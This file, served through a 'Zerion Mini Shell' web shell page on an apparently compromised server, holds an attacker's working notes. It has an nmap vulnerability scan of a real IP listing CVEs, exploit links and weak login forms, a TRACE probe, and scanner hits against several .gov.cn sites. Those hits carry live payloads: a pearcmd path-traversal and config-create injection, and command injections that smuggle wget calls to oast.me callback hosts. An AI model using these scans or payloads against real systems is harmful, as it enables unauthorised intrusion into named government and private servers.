%PDF-
%PDF-
Mini Shell
Mini Shell
| Direktori : /var/tmp/ |
|
|
|
| Current File : /var/tmp/New Text Document.txt |
Microsoft Windows [Version 10.0.19045.2130]
(c) Microsoft Corporation. All rights reserved.
C:\Windows\system32>nmap -sV -Pn -T4 -p 80,443 --script vuln 43.138.165.133
Starting Nmap 7.98 ( https://nmap.org ) at 2025-12-21 10:56 +0700
Stats: 0:02:20 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 97.56% done; ETC: 10:59 (0:00:03 remaining)
Stats: 0:04:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 11:00 (0:00:02 remaining)
Stats: 0:04:14 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 11:00 (0:00:02 remaining)
Stats: 0:06:42 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 98.96% done; ETC: 11:03 (0:00:04 remaining)
Nmap scan report for 43.138.165.133
Host is up (0.37s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.55 ((Win64) OpenSSL/1.1.1s PHP/5.6.3)
| http-cookie-flags:
| /:
| PHPSESSID:
|_ httponly flag not set
|_http-server-header: Apache/2.4.55 (Win64) OpenSSL/1.1.1s PHP/5.6.3
| vulners:
| cpe:/a:apache:http_server:2.4.55:
| PACKETSTORM:176334 9.8 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| CVE-2024-38476 9.8 https://vulners.com/cve/CVE-2024-38476
| CVE-2024-38474 9.8 https://vulners.com/cve/CVE-2024-38474
| CVE-2023-25690 9.8 https://vulners.com/cve/CVE-2023-25690
| CNVD-2024-36391 9.8 https://vulners.com/cnvd/CNVD-2024-36391
| CNVD-2024-36388 9.8 https://vulners.com/cnvd/CNVD-2024-36388
| 64A540A8-D918-5BEA-8F60-987F97B27A0C 9.8 https://vulners.com/githubexploit/64A540A8-D918-5BEA-8F60-987F97B27A0C *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 9.8 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 9.8 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 1337DAY-ID-39214 9.8 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| FD2EE3A5-BAEA-5845-BA35-E6889992214F 9.1 https://vulners.com/githubexploit/FD2EE3A5-BAEA-5845-BA35-E6889992214F *EXPLOIT*
| FBC8A8BE-F00A-5B6D-832E-F99A72E7A3F7 9.1 https://vulners.com/githubexploit/FBC8A8BE-F00A-5B6D-832E-F99A72E7A3F7 *EXPLOIT*
| E606D7F4-5FA2-5907-B30E-367D6FFECD89 9.1 https://vulners.com/githubexploit/E606D7F4-5FA2-5907-B30E-367D6FFECD89 *EXPLOIT*
| D8A19443-2A37-5592-8955-F614504AAF45 9.1 https://vulners.com/githubexploit/D8A19443-2A37-5592-8955-F614504AAF45 *EXPLOIT*
| CVE-2025-23048 9.1 https://vulners.com/cve/CVE-2025-23048
| CVE-2024-40898 9.1 https://vulners.com/cve/CVE-2024-40898
| CVE-2024-38475 9.1 https://vulners.com/cve/CVE-2024-38475
| CNVD-2025-16610 9.1 https://vulners.com/cnvd/CNVD-2025-16610
| CNVD-2024-36387 9.1 https://vulners.com/cnvd/CNVD-2024-36387
| CNVD-2024-33814 9.1 https://vulners.com/cnvd/CNVD-2024-33814
| B5E74010-A082-5ECE-AB37-623A5B33FE7D 9.1 https://vulners.com/githubexploit/B5E74010-A082-5ECE-AB37-623A5B33FE7D *EXPLOIT*
| 5418A85B-F4B7-5BBD-B106-0800AC961C7A 9.1 https://vulners.com/githubexploit/5418A85B-F4B7-5BBD-B106-0800AC961C7A *EXPLOIT*
| 3F71F065-66D4-541F-A813-9F1A2F2B1D91 8.8 https://vulners.com/githubexploit/3F71F065-66D4-541F-A813-9F1A2F2B1D91 *EXPLOIT*
| CVE-2025-58098 8.3 https://vulners.com/cve/CVE-2025-58098
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 8.2 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
| CVE-2024-38473 8.1 https://vulners.com/cve/CVE-2024-38473
| 249A954E-0189-5182-AE95-31C866A057E1 8.1 https://vulners.com/githubexploit/249A954E-0189-5182-AE95-31C866A057E1 *EXPLOIT*
| 23079A70-8B37-56D2-9D37-F638EBF7F8B5 8.1 https://vulners.com/githubexploit/23079A70-8B37-56D2-9D37-F638EBF7F8B5 *EXPLOIT*
| DF041B2B-2DA7-5262-AABE-9EBD2D535041 7.8 https://vulners.com/githubexploit/DF041B2B-2DA7-5262-AABE-9EBD2D535041 *EXPLOIT*
| PACKETSTORM:212872 7.5 https://vulners.com/packetstorm/PACKETSTORM:212872 *EXPLOIT*
| PACKETSTORM:211124 7.5 https://vulners.com/packetstorm/PACKETSTORM:211124 *EXPLOIT*
| EDB-ID:52426 7.5 https://vulners.com/exploitdb/EDB-ID:52426 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 7.5 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 7.5 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| D228B59B-465A-509D-A681-012DB9348698 7.5 https://vulners.com/githubexploit/D228B59B-465A-509D-A681-012DB9348698 *EXPLOIT*
| CVE-2025-59775 7.5 https://vulners.com/cve/CVE-2025-59775
| CVE-2025-55753 7.5 https://vulners.com/cve/CVE-2025-55753
| CVE-2025-53020 7.5 https://vulners.com/cve/CVE-2025-53020
| CVE-2025-49630 7.5 https://vulners.com/cve/CVE-2025-49630
| CVE-2024-47252 7.5 https://vulners.com/cve/CVE-2024-47252
| CVE-2024-43394 7.5 https://vulners.com/cve/CVE-2024-43394
| CVE-2024-43204 7.5 https://vulners.com/cve/CVE-2024-43204
| CVE-2024-42516 7.5 https://vulners.com/cve/CVE-2024-42516
| CVE-2024-39573 7.5 https://vulners.com/cve/CVE-2024-39573
| CVE-2024-38477 7.5 https://vulners.com/cve/CVE-2024-38477
| CVE-2024-38472 7.5 https://vulners.com/cve/CVE-2024-38472
| CVE-2024-27316 7.5 https://vulners.com/cve/CVE-2024-27316
| CVE-2023-43622 7.5 https://vulners.com/cve/CVE-2023-43622
| CVE-2023-31122 7.5 https://vulners.com/cve/CVE-2023-31122
| CVE-2023-27522 7.5 https://vulners.com/cve/CVE-2023-27522
| CNVD-2025-16614 7.5 https://vulners.com/cnvd/CNVD-2025-16614
| CNVD-2025-16613 7.5 https://vulners.com/cnvd/CNVD-2025-16613
| CNVD-2025-16612 7.5 https://vulners.com/cnvd/CNVD-2025-16612
| CNVD-2025-16609 7.5 https://vulners.com/cnvd/CNVD-2025-16609
| CNVD-2025-16608 7.5 https://vulners.com/cnvd/CNVD-2025-16608
| CNVD-2025-16603 7.5 https://vulners.com/cnvd/CNVD-2025-16603
| CNVD-2024-36393 7.5 https://vulners.com/cnvd/CNVD-2024-36393
| CNVD-2024-36390 7.5 https://vulners.com/cnvd/CNVD-2024-36390
| CNVD-2024-36389 7.5 https://vulners.com/cnvd/CNVD-2024-36389
| CNVD-2024-20839 7.5 https://vulners.com/cnvd/CNVD-2024-20839
| CNVD-2023-93320 7.5 https://vulners.com/cnvd/CNVD-2023-93320
| CDC791CD-A414-5ABE-A897-7CFA3C2D3D29 7.5 https://vulners.com/githubexploit/CDC791CD-A414-5ABE-A897-7CFA3C2D3D29 *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 7.5 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 7.5 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A6687F08-B033-5AE7-84F5-DE799491DA2F 7.5 https://vulners.com/githubexploit/A6687F08-B033-5AE7-84F5-DE799491DA2F *EXPLOIT*
| A66531EB-3C47-5C56-B8A6-E04B54E9D656 7.5 https://vulners.com/githubexploit/A66531EB-3C47-5C56-B8A6-E04B54E9D656 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 7.5 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 8132DEBA-6222-5A32-84DE-B97EF48D0F99 7.5 https://vulners.com/githubexploit/8132DEBA-6222-5A32-84DE-B97EF48D0F99 *EXPLOIT*
| 45D138AD-BEC6-552A-91EA-8816914CA7F4 7.5 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
| 40879618-C556-547C-8769-9E63E83D0B55 7.5 https://vulners.com/githubexploit/40879618-C556-547C-8769-9E63E83D0B55 *EXPLOIT*
| 1F6E0709-DA03-564E-925F-3177657C053E 7.5 https://vulners.com/githubexploit/1F6E0709-DA03-564E-925F-3177657C053E *EXPLOIT*
| 135C45BD-4652-5EEE-8890-2D3C62709016 7.5 https://vulners.com/githubexploit/135C45BD-4652-5EEE-8890-2D3C62709016 *EXPLOIT*
| CVE-2025-49812 7.4 https://vulners.com/cve/CVE-2025-49812
| CVE-2023-38709 7.3 https://vulners.com/cve/CVE-2023-38709
| CNVD-2024-36395 7.3 https://vulners.com/cnvd/CNVD-2024-36395
| CVE-2025-65082 6.5 https://vulners.com/cve/CVE-2025-65082
| CVE-2024-24795 6.3 https://vulners.com/cve/CVE-2024-24795
| CNVD-2024-36394 6.3 https://vulners.com/cnvd/CNVD-2024-36394
| CVE-2023-45802 5.9 https://vulners.com/cve/CVE-2023-45802
| CVE-2025-66200 5.4 https://vulners.com/cve/CVE-2025-66200
| CVE-2024-36387 5.4 https://vulners.com/cve/CVE-2024-36387
| CNVD-2024-36392 5.4 https://vulners.com/cnvd/CNVD-2024-36392
|_ CVE-2022-37436 5.3 https://vulners.com/cve/CVE-2022-37436
|_http-trace: TRACE is enabled
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-dombased-xss: Couldn't find any DOM based XSS.
| http-enum:
| /bak/: Backup folder w/ directory listing
|_ /test/: Test page
| http-fileupload-exploiter:
|
| Couldn't find a file-type field.
|
| Couldn't find a file-type field.
|
|_ Couldn't find a file-type field.
|_http-phpself-xss: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=43.138.165.133
| Found the following possible CSRF vulnerabilities:
|
| Path: http://43.138.165.133:80/
| Form id: sj
| Form action: Job.php
|
| Path: http://43.138.165.133:80/
| Form id: username
| Form action: company/user_checklogin.php
|
| Path: http://43.138.165.133:80/
| Form id: regform
| Form action: company/reg_userin.php
|
| Path: http://43.138.165.133:80/
| Form id: username
| Form action: person/user_checklogin.php
|
| Path: http://43.138.165.133:80/
| Form id: regform
| Form action: person/reg_userin.php
|
| Path: http://43.138.165.133:80/index.php
| Form id: sj
| Form action: Job.php
|
| Path: http://43.138.165.133:80/index.php
| Form id: username
| Form action: company/user_checklogin.php
|
| Path: http://43.138.165.133:80/index.php
| Form id: regform
| Form action: company/reg_userin.php
|
| Path: http://43.138.165.133:80/index.php
| Form id: username
| Form action: person/user_checklogin.php
|
| Path: http://43.138.165.133:80/index.php
| Form id: regform
| Form action: person/reg_userin.php
|
| Path: http://43.138.165.133:80/Job.php?dq=5WbWKJzf6cZkiMzx5NYm68/O0O0O
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/Job.php?dq=5WbWKJzf6cZkiMzx5NYm68/O0O0O
| Form id: sr
| Form action: Job.php
|
| Path: http://43.138.165.133:80/Job.php?dq=5W7WuJPf5cbkyMAx5NYmy86O0O0O
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/Job.php?dq=5W7WuJPf5cbkyMAx5NYmy86O0O0O
| Form id: sr
| Form action: Job.php
|
| Path: http://43.138.165.133:80/lgsc.php
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/lgsc.php
| Form id: sr
| Form action: lgsc.php
|
| Path: http://43.138.165.133:80/meeting.php
| Form id:
| Form action: meeting.php
|
| Path: http://43.138.165.133:80/Job.php?dq=5WrWGJof5c7k2MXx5Nbmi8CO0O0O
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/Job.php?dq=5WrWGJof5c7k2MXx5Nbmi8CO0O0O
| Form id: sr
| Form action: Job.php
|
| Path: http://43.138.165.133:80/Job.php?dq=5WbWmJzf5crkGMfx5NYm68/O0O0O
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/Job.php?dq=5WbWmJzf5crkGMfx5NYm68/O0O0O
| Form id: sr
| Form action: Job.php
|
| Path: http://43.138.165.133:80/Job.php?dq=5WYW2JOf5cak6M5x5NYm68/O0O0O
| Form id: sj
| Form action:
|
| Path: http://43.138.165.133:80/Job.php?dq=5WYW2JOf5cak6M5x5NYm68/O0O0O
| Form id: sr
| Form action: Job.php
|
| Path: http://43.138.165.133:80/meetingmap.php?num=006
| Form id: sj
|_ Form action: Job.php
443/tcp open ssl/http Apache httpd 2.4.55 ((Win64) OpenSSL/1.1.1s PHP/5.6.3)
|_ssl-ccs-injection: No reply from server (TIMEOUT)
|_http-server-header: Apache/2.4.55 (Win64) OpenSSL/1.1.1s PHP/5.6.3
|_http-trace: TRACE is enabled
| vulners:
| cpe:/a:apache:http_server:2.4.55:
| PACKETSTORM:176334 9.8 https://vulners.com/packetstorm/PACKETSTORM:176334 *EXPLOIT*
| CVE-2024-38476 9.8 https://vulners.com/cve/CVE-2024-38476
| CVE-2024-38474 9.8 https://vulners.com/cve/CVE-2024-38474
| CVE-2023-25690 9.8 https://vulners.com/cve/CVE-2023-25690
| CNVD-2024-36391 9.8 https://vulners.com/cnvd/CNVD-2024-36391
| CNVD-2024-36388 9.8 https://vulners.com/cnvd/CNVD-2024-36388
| 64A540A8-D918-5BEA-8F60-987F97B27A0C 9.8 https://vulners.com/githubexploit/64A540A8-D918-5BEA-8F60-987F97B27A0C *EXPLOIT*
| 5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 9.8 https://vulners.com/githubexploit/5C1BB960-90C1-5EBF-9BEF-F58BFFDFEED9 *EXPLOIT*
| 3F17CA20-788F-5C45-88B3-E12DB2979B7B 9.8 https://vulners.com/githubexploit/3F17CA20-788F-5C45-88B3-E12DB2979B7B *EXPLOIT*
| 1337DAY-ID-39214 9.8 https://vulners.com/zdt/1337DAY-ID-39214 *EXPLOIT*
| FD2EE3A5-BAEA-5845-BA35-E6889992214F 9.1 https://vulners.com/githubexploit/FD2EE3A5-BAEA-5845-BA35-E6889992214F *EXPLOIT*
| FBC8A8BE-F00A-5B6D-832E-F99A72E7A3F7 9.1 https://vulners.com/githubexploit/FBC8A8BE-F00A-5B6D-832E-F99A72E7A3F7 *EXPLOIT*
| E606D7F4-5FA2-5907-B30E-367D6FFECD89 9.1 https://vulners.com/githubexploit/E606D7F4-5FA2-5907-B30E-367D6FFECD89 *EXPLOIT*
| D8A19443-2A37-5592-8955-F614504AAF45 9.1 https://vulners.com/githubexploit/D8A19443-2A37-5592-8955-F614504AAF45 *EXPLOIT*
| CVE-2025-23048 9.1 https://vulners.com/cve/CVE-2025-23048
| CVE-2024-40898 9.1 https://vulners.com/cve/CVE-2024-40898
| CVE-2024-38475 9.1 https://vulners.com/cve/CVE-2024-38475
| CNVD-2025-16610 9.1 https://vulners.com/cnvd/CNVD-2025-16610
| CNVD-2024-36387 9.1 https://vulners.com/cnvd/CNVD-2024-36387
| CNVD-2024-33814 9.1 https://vulners.com/cnvd/CNVD-2024-33814
| B5E74010-A082-5ECE-AB37-623A5B33FE7D 9.1 https://vulners.com/githubexploit/B5E74010-A082-5ECE-AB37-623A5B33FE7D *EXPLOIT*
| 5418A85B-F4B7-5BBD-B106-0800AC961C7A 9.1 https://vulners.com/githubexploit/5418A85B-F4B7-5BBD-B106-0800AC961C7A *EXPLOIT*
| 3F71F065-66D4-541F-A813-9F1A2F2B1D91 8.8 https://vulners.com/githubexploit/3F71F065-66D4-541F-A813-9F1A2F2B1D91 *EXPLOIT*
| CVE-2025-58098 8.3 https://vulners.com/cve/CVE-2025-58098
| B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 8.2 https://vulners.com/githubexploit/B0A9E5E8-7CCC-5984-9922-A89F11D6BF38 *EXPLOIT*
| CVE-2024-38473 8.1 https://vulners.com/cve/CVE-2024-38473
| 249A954E-0189-5182-AE95-31C866A057E1 8.1 https://vulners.com/githubexploit/249A954E-0189-5182-AE95-31C866A057E1 *EXPLOIT*
| 23079A70-8B37-56D2-9D37-F638EBF7F8B5 8.1 https://vulners.com/githubexploit/23079A70-8B37-56D2-9D37-F638EBF7F8B5 *EXPLOIT*
| DF041B2B-2DA7-5262-AABE-9EBD2D535041 7.8 https://vulners.com/githubexploit/DF041B2B-2DA7-5262-AABE-9EBD2D535041 *EXPLOIT*
| PACKETSTORM:212872 7.5 https://vulners.com/packetstorm/PACKETSTORM:212872 *EXPLOIT*
| PACKETSTORM:211124 7.5 https://vulners.com/packetstorm/PACKETSTORM:211124 *EXPLOIT*
| EDB-ID:52426 7.5 https://vulners.com/exploitdb/EDB-ID:52426 *EXPLOIT*
| E5C174E5-D6E8-56E0-8403-D287DE52EB3F 7.5 https://vulners.com/githubexploit/E5C174E5-D6E8-56E0-8403-D287DE52EB3F *EXPLOIT*
| DB6E1BBD-08B1-574D-A351-7D6BB9898A4A 7.5 https://vulners.com/githubexploit/DB6E1BBD-08B1-574D-A351-7D6BB9898A4A *EXPLOIT*
| D228B59B-465A-509D-A681-012DB9348698 7.5 https://vulners.com/githubexploit/D228B59B-465A-509D-A681-012DB9348698 *EXPLOIT*
| CVE-2025-59775 7.5 https://vulners.com/cve/CVE-2025-59775
| CVE-2025-55753 7.5 https://vulners.com/cve/CVE-2025-55753
| CVE-2025-53020 7.5 https://vulners.com/cve/CVE-2025-53020
| CVE-2025-49630 7.5 https://vulners.com/cve/CVE-2025-49630
| CVE-2024-47252 7.5 https://vulners.com/cve/CVE-2024-47252
| CVE-2024-43394 7.5 https://vulners.com/cve/CVE-2024-43394
| CVE-2024-43204 7.5 https://vulners.com/cve/CVE-2024-43204
| CVE-2024-42516 7.5 https://vulners.com/cve/CVE-2024-42516
| CVE-2024-39573 7.5 https://vulners.com/cve/CVE-2024-39573
| CVE-2024-38477 7.5 https://vulners.com/cve/CVE-2024-38477
| CVE-2024-38472 7.5 https://vulners.com/cve/CVE-2024-38472
| CVE-2024-27316 7.5 https://vulners.com/cve/CVE-2024-27316
| CVE-2023-43622 7.5 https://vulners.com/cve/CVE-2023-43622
| CVE-2023-31122 7.5 https://vulners.com/cve/CVE-2023-31122
| CVE-2023-27522 7.5 https://vulners.com/cve/CVE-2023-27522
| CNVD-2025-16614 7.5 https://vulners.com/cnvd/CNVD-2025-16614
| CNVD-2025-16613 7.5 https://vulners.com/cnvd/CNVD-2025-16613
| CNVD-2025-16612 7.5 https://vulners.com/cnvd/CNVD-2025-16612
| CNVD-2025-16609 7.5 https://vulners.com/cnvd/CNVD-2025-16609
| CNVD-2025-16608 7.5 https://vulners.com/cnvd/CNVD-2025-16608
| CNVD-2025-16603 7.5 https://vulners.com/cnvd/CNVD-2025-16603
| CNVD-2024-36393 7.5 https://vulners.com/cnvd/CNVD-2024-36393
| CNVD-2024-36390 7.5 https://vulners.com/cnvd/CNVD-2024-36390
| CNVD-2024-36389 7.5 https://vulners.com/cnvd/CNVD-2024-36389
| CNVD-2024-20839 7.5 https://vulners.com/cnvd/CNVD-2024-20839
| CNVD-2023-93320 7.5 https://vulners.com/cnvd/CNVD-2023-93320
| CDC791CD-A414-5ABE-A897-7CFA3C2D3D29 7.5 https://vulners.com/githubexploit/CDC791CD-A414-5ABE-A897-7CFA3C2D3D29 *EXPLOIT*
| BD3652A9-D066-57BA-9943-4E34970463B9 7.5 https://vulners.com/githubexploit/BD3652A9-D066-57BA-9943-4E34970463B9 *EXPLOIT*
| B0208442-6E17-5772-B12D-B5BE30FA5540 7.5 https://vulners.com/githubexploit/B0208442-6E17-5772-B12D-B5BE30FA5540 *EXPLOIT*
| A6687F08-B033-5AE7-84F5-DE799491DA2F 7.5 https://vulners.com/githubexploit/A6687F08-B033-5AE7-84F5-DE799491DA2F *EXPLOIT*
| A66531EB-3C47-5C56-B8A6-E04B54E9D656 7.5 https://vulners.com/githubexploit/A66531EB-3C47-5C56-B8A6-E04B54E9D656 *EXPLOIT*
| 9814661A-35A4-5DB7-BB25-A1040F365C81 7.5 https://vulners.com/githubexploit/9814661A-35A4-5DB7-BB25-A1040F365C81 *EXPLOIT*
| 8132DEBA-6222-5A32-84DE-B97EF48D0F99 7.5 https://vulners.com/githubexploit/8132DEBA-6222-5A32-84DE-B97EF48D0F99 *EXPLOIT*
| 45D138AD-BEC6-552A-91EA-8816914CA7F4 7.5 https://vulners.com/githubexploit/45D138AD-BEC6-552A-91EA-8816914CA7F4 *EXPLOIT*
| 40879618-C556-547C-8769-9E63E83D0B55 7.5 https://vulners.com/githubexploit/40879618-C556-547C-8769-9E63E83D0B55 *EXPLOIT*
| 1F6E0709-DA03-564E-925F-3177657C053E 7.5 https://vulners.com/githubexploit/1F6E0709-DA03-564E-925F-3177657C053E *EXPLOIT*
| 135C45BD-4652-5EEE-8890-2D3C62709016 7.5 https://vulners.com/githubexploit/135C45BD-4652-5EEE-8890-2D3C62709016 *EXPLOIT*
| CVE-2025-49812 7.4 https://vulners.com/cve/CVE-2025-49812
| CVE-2023-38709 7.3 https://vulners.com/cve/CVE-2023-38709
| CNVD-2024-36395 7.3 https://vulners.com/cnvd/CNVD-2024-36395
| CVE-2025-65082 6.5 https://vulners.com/cve/CVE-2025-65082
| CVE-2024-24795 6.3 https://vulners.com/cve/CVE-2024-24795
| CNVD-2024-36394 6.3 https://vulners.com/cnvd/CNVD-2024-36394
| CVE-2023-45802 5.9 https://vulners.com/cve/CVE-2023-45802
| CVE-2025-66200 5.4 https://vulners.com/cve/CVE-2025-66200
| CVE-2024-36387 5.4 https://vulners.com/cve/CVE-2024-36387
| CNVD-2024-36392 5.4 https://vulners.com/cnvd/CNVD-2024-36392
|_ CVE-2022-37436 5.3 https://vulners.com/cve/CVE-2022-37436
| http-aspnet-debug:
|_ status: DEBUG is enabled
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 555.58 seconds
C:\Windows\system32>curl -X TRACE http://43.138.165.133/
TRACE / HTTP/1.1
Host: 43.138.165.133
User-Agent: curl/7.83.1
Accept: */*
C:\Windows\system32>
[CNVD-2022-86535] [http] [high] https://www.93sc.gov.cn
[CNVD-2022-86535] [http] [high] https://www.93sc.gov.cn/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+nV9kBHa7uo.log
[CNVD-2022-86535] [http] [high] https://www.lzxwmsj.gov.cn/?lang=../../../../../usr/local/php/pearcmd
[CNVD-2022-86535] [http] [high] https://www.lzxwmsj.gov.cn
[CNVD-2022-86535] [http] [high] https://www.lzxwmsj.gov.cn/?+config-create+/&lang=../../../../../../../../../../../usr/local/lib/php/pearcmd&/safedog()+IIFvQL3I7U.log
[CVE-2014-3206] [http] [critical] https://vod.djhy.gov.cn/backupmgt/localJob.php?session=fail;wget+http://d5379uuvrlk0v039ede0t8j7d9ougfbbx.oast.me;
[CVE-2014-3206] [http] [critical] https://vod.djhy.gov.cn/backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d5379uuvrlk0v039ede0ohqy4a6chjari.oast.me;
[CVE-2014-3206] [http] [critical] https://yn1.119.gov.cn/backupmgt/pre_connect_check.php?auth_name=fail;wget+http://d5379uuvrlk0v039ede0tek4dnsxia4d1.oast.me;
[CVE-2014-3206] [http] [critical] https://yn1.119.gov.cn/backupmgt/localJob.php?session=fail;wget+http://d5379uuvrlk0v039ede04r5nsa795h9i5.oast.me;
Zerion Mini Shell 1.0